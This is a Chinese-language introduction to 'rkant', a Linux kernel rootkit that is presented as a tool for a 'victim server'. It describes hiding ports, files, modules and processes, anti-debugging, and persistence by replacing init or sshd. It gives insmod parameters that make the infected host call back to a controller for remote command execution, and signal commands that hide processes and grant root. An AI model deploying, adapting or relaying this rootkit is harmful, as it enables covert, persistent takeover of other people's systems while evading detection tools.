linux后门rootkit程序介绍

rkant = rootkit ant，它是利用netfilter hook开发的一款linux后门rootkit程序。


rkant包括服务器端程序(on victim server)和客户端程序(on user client pc)，在ubuntu 14.04版本上面测试通过。
功能：
1、隐藏网络连接/端口，任意端口复用。不影响系统的正常工作和服务的正常运行。
2、隐藏文件以及目录，用linux工具无法查看到。防删除。
3、隐藏模块信息。ls /sys/module和lsmod都看不到任何模块信息。
4、开机自启动，感染sshd或init。
5、反向连接。服务器定时连接指定的ip/port。
6、反调试，防止被跟踪和破解。内容加密传送。
7、隐藏进程。
8、任何用户提权，获得root权限。


rkant通过rootkit hunter1.4.0检查，不被发现。


rkant.ko设计要点：
1、安装时，会隐藏式启动一个后门进程（antclient)。
2、在内核空间中尝试向指定的pc机（模块参数指定mac_addr/ip/port）发送探测消息，直到收到回应为止。
3、pc机(antkeeper)给server回送hello消息时，可传送需要执行的脚本比如sh /dev/rkant/myspy.sh，这样达到远程执行命令的目的。
4、在收到pc机给出的hello消息后，rootdoor回送hello_ack消息。在hello_ack消息中可送出任何想送出的信息，比如myspy.sh的执行结果或是其它信息。


安装说明：
1.将rkant.ko/antclient放到server的/etc/rkant目录下面。
2.将antkeeper放到客户机上面，任何一个目录均可。


在server中，如果用的是eth1，那么，安装参数是：
insmod rkant.ko dnet=eth1 dmac=00:0c:29:40:99:20 dip=192.168.2.8//damc/dip是目标机（client pc)的mac和ip，它是虚拟机2


antkeeper运行方法：
./antkeeper 192.168.2.8 192.168.2.113 //第一个ip是本机的ip，第二个ip是server的ip。
如果拿不到server的ip，也就是说server只有内网IP，无公网IP。那第二个ip就不填，留空。


测试情况：
1、内核版本升级后再测试。Ubuntu14.0.4.1基础上升级内核为3.16.1
2、通信测试回联。
同时支持icmp和tcp port方式回联。
./antkeeper 192.168.1.10[测试机，执行antkeeper的机器] 192.168.1.111[服务器，安装rkant.ko的机器]
安装模块方法：insmod rkant.ko dnet=eth0 dmac=00:0c:29:18:94:fa dip=192.168.2.9 dbg=1//dbg是新增的打开消息开关。
通过查看#dmesg可以看到打印消息，以方便定位问题。
记得要在另外一个计算机上执行：#./antkeeper 192.168.1.10 192.168.1.111
这样就可以收到回传消息，相当于一个远程shell。


3、开机自启动。
在server版本，可用init来替换原来的/sbin/init。在desktop版本，可以用sshd来替换/usr/sbin/sshd
新的init和sshd就会先调用/etc/rkant/bin/run.sh后再调用init和sshd。由此实现自启动。
记得先备份原来系统的init或sshd到/etc/rkant/bin目录下。/etc/rkant是安装目录，请先创建。


4、任何一个进程都可以隐藏。
方法：# kill -31 pid [你要隐藏的进程的pid]


5、隐藏某一个用户。
>>无法隐藏用户。只能是用linux缺省就有帐户比如sys或bin帐户来登录，然后进行提权。

当前用户取得root权限方法：# kill -64 65535